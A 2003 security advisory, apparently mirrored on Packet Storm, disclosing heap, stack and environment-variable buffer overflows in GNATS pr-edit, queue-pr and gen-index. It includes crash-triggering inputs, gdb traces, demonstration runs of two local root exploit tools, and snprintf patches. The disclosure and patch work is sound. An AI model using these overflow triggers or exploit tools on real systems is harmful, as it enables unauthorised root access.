exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

INetCop.GNATS.txt

INetCop.GNATS.txt
Posted Jun 22, 2003
Authored by Xpl017Elz | Site inetcop.org

INetCop Security Advisory #2003-0x82-018 - The GNU bug tracking system GNATS has two bugs that exist in the pr-edit (Problem report editor) program. There is a heap based overflow when a user uses the -d option to input a directory name under version 3.2 There is an environment variable overflow vulnerability in version 3.113.x that will also yield root privileges.

tags | advisory, overflow, root
SHA-256 | ec98715198eb39ad65760e2d10ba0f2596b85ed8ee3d03b7491e1cdb626cea06

INetCop.GNATS.txt

Change Mirror Download


========================================
INetCop Security Advisory #2003-0x82-018
========================================


Title: GNATS (The GNU bug-tracking system) multiple buffer overflow vulnerabilities.


0x01. Description

About:
GNATS is a portable incident/bug report/help request-tracking system which runs on UNIX-like operating systems.
It easily handles thousands of problem reports, has been in wide use since the early 90s,
and can do most of its operations over e-mail.
Several front end interfaces exist, including command line, emacs, and Tcl/Tk interfaces.
There are also a number of Web (CGI) interfaces written in scripting languages like Perl and Python.

More detailed information references next URL.

URL: http://www.gnu.org/software/gnats/

Various kinds version vulnerability of GNATS exists.

Point that must know before test vulnerability,
As following, through signal() function, prevent that segfault happens.
This appears as if program is achieved well without any something wrong.

--
[root@xpl017elz gnats]# strace ./pr-edit
...
rt_sigaction(SIGSEGV, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGHUP, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTERM, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGABRT, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGILL, {0x804a33c, [], SA_RESTART|0x4000000}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGABRT, {0x804a33c, [], SA_RESTART|0x4000000}, {0x804a33c, [], SA_RESTART|0x4000000}, 8) = 0
...
[root@xpl017elz gnats]# cat pr-edit.c | grep signal
block_signals ();
unblock_signals ();
[root@xpl017elz gnats]#
--

First, there are two bugs in pr-edit program that is `Problem report editer' in GNATS 3.002.
For reference, setuid (root or, gnats) of pr-edit program is established to basis.
(Why is root setuid established in Linux? When install, user who is gnats must exist to system.
If don't exist, setuid has been established by root's uid.)

#1-1) pr-edit Heap based Overflow -

In directory name that user inputs, heap based overflow happens. (It's `-d' option)

`/gnats-3.2/gnats/pr-edit.c':
--
...
83 void
84 main (argc, argv)
85 int argc;
86 char **argv;
87 {
...
170 lock_gnats ();
...
--

lock_gnats() function exists to `/gnats-3.2/gnats/internal.c' line:199.

`/gnats-3.2/gnats/internal.c':
--
...
199 void
200 lock_gnats ()
201 {
202 char *path = (char *) xmalloc (PATH_MAX);
...
206 sprintf (path, "%s/gnats-adm/gnats.lock", gnats_root); // here.
...
--

#1-2) pr-edit Stack based Overflow -

When this bug reads "PR".lock file, happens.

lock_pr() function exists to `/gnats-3.2/gnats/pr-edit.c' line:390.

`/gnats-3.2/gnats/pr-edit.c':
--
...
172 switch (edit_options) {
173 case LOCK:
174 result = lock_pr (fname, username);
175 break;
...
390 static int
391 lock_pr (fname, user)
392 char *fname, *user;
393 {
...
403 if (stat (lock_path, &buf) == 0)
404 {
405 FILE *fp = fopen (lock_path, "r");
406 char buf[1024];
...
413 fscanf (fp, "%s", buf); // here.
414 fprintf (stderr, "%s: PR %s locked by %s\n", program_name,
415 fname, buf);
416 fclose (fp);
...
--

If insert attack code to lock_path, can do several buffers overwrite when read file. ;-}
This is possible (100%) exploit.
(only, must close file pointer, and must do several buffers overflow.)

Second, is vulnerability that exist to GNATS 3.113.x.
This is environment variable overflow vulnerability.

#2) gen-index, pr-edit, queue-pr Heap based environment variable Overflow -

There is init_gnats() function to `/gnats-3.113.1/gnats/pr-edit.c' code. (line:170)

`/gnats-3.113.1/gnats/pr-edit.c':
--
...
170 init_gnats (program_name);
...
--

There is configure() function to `/gnats-3.113.1/gnats/misc.c' code. (line:41)

`/gnats-3.113.1/gnats/misc.c':
--
...
41 void
42 init_gnats (program_name)
43 char *program_name;
...
48 configure ();
...
--

init_gnats() -> configure() -> getenv();

`/gnats-3.113.1/gnats/config.c':
--
...
132 if (! gnats_root)
133 {
134 gnats_root = getenv ("GNATS_ROOT");
...
--

Overflow happens by use of most sprintf() function.

bash-2.04# cat *.patch | grep sprintf
- sprintf (path, "%s/gnats-adm/%s", gnats_root, RESPONSIBLE_FILE);
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CLASSES);
- sprintf (path, "%s/gnats-adm/%s", gnats_root, STATES);
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CATEGORIES);
- sprintf (index_filename, "%s/gnats-adm/%s", gnats_root, INDEX);
- sprintf (path, "%s/gnats-adm/gnats.lock", gnats_root);
bash-2.04#

Also, this is possible (100%) exploit.


0x02. Vulnerable Packages


Vendor site: http://www.gnu.org/software/gnats/

GNATS 3.002 version. (exploitable)
-gnats-3.002.tar.gz or, gnats-3.2.tar.gz
+*Linux
+*Unix
GNATS 3.113.1 version. (exploitable)
-gnats-3.113.1.tar.gz
GNATS 3.113 version. (exploitable)
-gnats-3.113.tar.gz


0x03. Exploit


#1) GNATS v3.002 pr-edit Heap Overflow:


(gdb) r -d`perl -e 'print "x"x9000'`
Starting program: /usr/local/lib/gnats/./pr-edit -d`perl -e 'print "x"x9000'`

Program received signal SIGSEGV, Segmentation fault.
0x40075cf5 in __mempcpy (dstpp=0x8051988, srcpp=0xbfffd9e5, len=9000)
at ../sysdeps/generic/mempcpy.c:57
57 ../sysdeps/generic/mempcpy.c: No such file or directory.
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x4006fcba in chunk_alloc (ar_ptr=0x40104040, nb=4104) at malloc.c:2884
2884 malloc.c: No such file or directory.
(gdb)


#2) GNATS v3.002 pr-edit Stack Overflow:


[x82@xpl017elz gnats]$ perl -e 'print "x"x2000' > /tmp/x82.lock
[x82@xpl017elz gnats]$ cat /tmp/x82.lock
xxxxxxxxxxxxxxxxxxxxxx ... xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ... xxxxxxxxx
[x82@xpl017elz gnats]$ gdb -q pr-edit
(gdb) r -d /tmp/ -l ./x82 ./x82
Starting program: /usr/local/lib/gnats/./pr-edit -d /tmp/ -l ./x82 ./x82
pr-edit: PR locked by xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ...
... xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Program received signal SIGSEGV, Segmentation fault.
0x4005d72a in _IO_vfprintf (s=0xbfffcf94,
format=0x804cea7 "%s: PR %s locked by %s\n", ap=0xbffff70c)
at vfprintf.c:1259
1259 vfprintf.c: No such file or directory.
(gdb) where
#0 0x4005d72a in _IO_vfprintf (s=0xbfffcf94,
format=0x804cea7 "%s: PR %s locked by %s\n", ap=0xbffff70c)
at vfprintf.c:1259
#1 0x400606b4 in buffered_vfprintf (s=0x40103d20,
format=0x804cea7 "%s: PR %s locked by %s\n", args=0xbffff704)
at vfprintf.c:1758
#2 0x4005bf66 in _IO_vfprintf (s=0x40103d20,
format=0x804cea7 "%s: PR %s locked by %s\n", ap=0xbffff704)
at vfprintf.c:1029
#3 0x40063f47 in fprintf (stream=0x40103d20,
format=0x804cea7 "%s: PR %s locked by %s\n") at fprintf.c:32
#4 0x80498a9 in lock_pr (fname=0x78787878 <Address 0x78787878 out of bounds>,
user=0x78787878 <Address 0x78787878 out of bounds>) at pr-edit.c:414
#5 0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)


* Test exploit:


[x82@xpl017elz gnats]$ ./0x82-gnats_own -h

GNATS v3.2 (The GNU bug-tracking system) local root exploit.
by Xpl017Elz.

Usage: ./0x82-gnats_own -option [argument]

-p [pr-edit path] : GNATS pr-edit path.
-t [target num] : Select gcc version number.
{0} : gcc old version.
{1} : gcc new version.
-b [target path] : setuid shell path.
-h : Help information.

Example: ./0x82-gnats_own -p/usr/local/lib/gnats/pr-edit -t1 -b/tmp/gnats-0day

[x82@xpl017elz gnats]$ ./0x82-gnats_own -t0

GNATS v3.2 (The GNU bug-tracking system) local root exploit.
by Xpl017Elz.

[0] Start, exploit.
[+] exploit target: /usr/local/lib/gnats/pr-edit
[1] Make setuid shell.
[+] Setuid shell path: /tmp/gnats-0day
[2] Shellcode setting.
[+] Shellcode address: 0xbfffffac
[3] Make `gnats-adm' directory.
[4] Make user.lock file.
[+] Execute, Shellcode !!

pr-edit: PR
locked by ...FFFFFFFFFFFFF...SSSSSSSSSSSSSS...

[5] Remove setting dir, files.
[+] exploit successfully.
[*] It's root shell !!

bash#


#3) GNATS v3.113.x pr-edit, queue-pr, gen-index Heap based environment variable Overflow:


bash-2.04$ export GNATS_ROOT=`perl -e 'print "x"x5000'`
bash-2.04$ gdb -q ./pr-edit
(gdb) r
Starting program: /usr/local/libexec/gnats/./pr-edit

Program received signal SIGSEGV, Segmentation fault.
0x804c416 in init_states () at files.c:611
611 s_end->next = s;
(gdb) where
#0 0x804c416 in init_states () at files.c:611
#1 0x78787878 in ?? ()
Cannot access memory at address 0x78787878
(gdb)


* Test exploit:


bash-2.04$ ./0x82-GNATS_sux -h

GNATS v3.113.x (The GNU bug-tracking system) local root exploit.

Usage: ./0x82-GNATS_sux -option [argument]

-o [offset num] : offset number.
-r [retloc addr] : retloc GOT address.
-s [shell addr] : shellcode address.
-f [chunk addr] : fake chunk address.
-p [chunk ptr] : fake chunk address ptr.
-v : verbose mode.
-h : help information.
-t [target num] : select target number.

Select target number:

{0} : Red Hat Linux release 6.1 (Cartman) : GNATS gen-index v3.113
{1} : Red Hat Linux release 6.1 (Cartman) : GNATS gen-index v3.113.1
{2} : Red Hat Linux release 6.2 (Zoot) : GNATS gen-index v3.113
{3} : Red Hat Linux release 6.2 (Zoot) : GNATS gen-index v3.113.1
{4} : Red Hat Linux release 7.0 (Guinness) : GNATS gen-index v3.113
{5} : Red Hat Linux release 7.0 (Guinness) : GNATS gen-index v3.113.1
{6} : Red Hat Linux release 7.3 (Valhalla) : GNATS gen-index v3.113
{7} : Red Hat Linux release 7.3 (Valhalla) : GNATS gen-index v3.113.1

Sample #1): ./0x82-GNATS_sux -t0
Sample #2): ./0x82-GNATS_sux -o0 -r0x82828282 -s0x8282bab0 -v

bash-2.04$ ./0x82-GNATS_sux -t4

GNATS v3.113.x (The GNU bug-tracking system) local root exploit.

[=] Offset: 0
[=] fprintf GOT address: 0x8056d10
[=] shellcode address: 0xbfffedee
[=] fake chunk address: 0x805750c
[=] fake chunk address ptr: 0x8058504
[0] Make fake chunk.
[1] Set fake chunk address.
[2] Make 16byte magic code.
[3] Make shellcode.
[4] Set environment attack code.
[5] Try exploit ...

sh-2.04#


0x04. Patch


GNATS v3.002 patch:

=== gnats-3.002.patch ===
--- internal.c Sat Dec 11 05:02:19 1993
+++ ../gnats.bak/internal.c Sat Jun 14 15:18:10 2003
@@ -203,7 +203,7 @@
struct stat buf;
int count;

- sprintf (path, "%s/gnats-adm/gnats.lock", gnats_root);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/gnats.lock", gnats_root);

#define MAXWAIT 10
#define GRANULARITY 1
--- pr-edit.c Sat Dec 11 05:02:27 1993
+++ ../gnats.bak/pr-edit.c Sat Jun 14 15:16:35 2003
@@ -410,7 +410,7 @@
if (fp == (FILE *) NULL)
return 0;

- fscanf (fp, "%s", buf);
+ fscanf (fp, "%1023s", buf);
fprintf (stderr, "%s: PR %s locked by %s\n", program_name,
fname, buf);
fclose (fp);

=== eof ===

GNATS v3.113 patch:

=== gnats-3.113.patch ===
--- files.c Wed Sep 22 08:18:39 1999
+++ ../gnats.bak/files.c Sat Jun 14 14:06:17 2003
@@ -271,7 +271,7 @@
char *path = (char *) alloca (PATH_MAX);

memset (array, 0, NUM_RESPONSIBLE_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, RESPONSIBLE_FILE);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, RESPONSIBLE_FILE);
fp = fopen (path, "r");
if (fp == NULL)
return 0;
@@ -358,7 +358,7 @@
int i, nerrs = 0;

memset (array, 0, NUM_CLASS_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CLASSES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, CLASSES);
fp = fopen (path, "r");

if (fp == NULL)
@@ -585,7 +585,7 @@
int i, nerrs = 0;

memset (array, 0, NUM_STATE_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, STATES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, STATES);
fp = fopen (path, "r");

if (fp == NULL)
--- gen-index.c Wed Sep 22 08:18:39 1999
+++ ../gnats.bak/gen-index.c Sat Jun 14 14:06:55 2003
@@ -256,7 +256,7 @@
Categories *c;

if (! catfile)
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CATEGORIES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, CATEGORIES);
else
path = catfile;

--- index.c Thu Mar 18 08:45:38 1999
+++ ../gnats.bak/index.c Sat Jun 14 14:07:43 2003
@@ -399,7 +399,7 @@
if (! index_filename)
{
index_filename = (char *) xmalloc (PATH_MAX);
- sprintf (index_filename, "%s/gnats-adm/%s", gnats_root, INDEX);
+ snprintf (index_filename, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, INDEX);
}

fp = fopen (index_filename, "r");
--- internal.c Wed Mar 3 09:18:53 1999
+++ ../gnats.bak/internal.c Sat Jun 14 14:08:27 2003
@@ -238,7 +238,7 @@
struct stat buf;
int count;

- sprintf (path, "%s/gnats-adm/gnats.lock", gnats_root);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/gnats.lock", gnats_root);

#define MAXWAIT 10
#define GRANULARITY 1

=== eof ===

GNATS v3.113.1 patch:

=== gnats-3.113.1.patch ===
--- files.c Mon Feb 12 06:36:25 2001
+++ ../gnats.bak/files.c Sat Jun 14 13:17:58 2003
@@ -271,7 +271,7 @@
char *path = (char *) alloca (PATH_MAX);

memset (array, 0, NUM_RESPONSIBLE_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, RESPONSIBLE_FILE);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, RESPONSIBLE_FILE);
fp = fopen (path, "r");
if (fp == NULL)
return 0;
@@ -358,7 +358,7 @@
int i, nerrs = 0;

memset (array, 0, NUM_CLASS_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CLASSES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, CLASSES);
fp = fopen (path, "r");

if (fp == NULL)
@@ -593,7 +593,7 @@
int i, nerrs = 0;

memset (array, 0, NUM_STATE_FIELDS * sizeof (char *));
- sprintf (path, "%s/gnats-adm/%s", gnats_root, STATES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, STATES);
fp = fopen (path, "r");

if (fp == NULL)
--- gen-index.c Wed Sep 22 08:18:39 1999
+++ ../gnats.bak/gen-index.c Sat Jun 14 13:19:58 2003
@@ -256,7 +256,7 @@
Categories *c;

if (! catfile)
- sprintf (path, "%s/gnats-adm/%s", gnats_root, CATEGORIES);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, CATEGORIES);
else
path = catfile;

--- index.c Thu Mar 18 08:45:38 1999
+++ ../gnats.bak/index.c Sat Jun 14 13:22:21 2003
@@ -399,7 +399,7 @@
if (! index_filename)
{
index_filename = (char *) xmalloc (PATH_MAX);
- sprintf (index_filename, "%s/gnats-adm/%s", gnats_root, INDEX);
+ snprintf (index_filename, PATH_MAX-1, "%s/gnats-adm/%s", gnats_root, INDEX);
}

fp = fopen (index_filename, "r");
--- internal.c Wed Mar 3 09:18:53 1999
+++ ../gnats.bak/internal.c Sat Jun 14 14:09:45 2003
@@ -238,7 +238,7 @@
struct stat buf;
int count;

- sprintf (path, "%s/gnats-adm/gnats.lock", gnats_root);
+ snprintf (path, PATH_MAX-1, "%s/gnats-adm/gnats.lock", gnats_root);

#define MAXWAIT 10
#define GRANULARITY 1

=== eof ===


P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net & http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--


--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close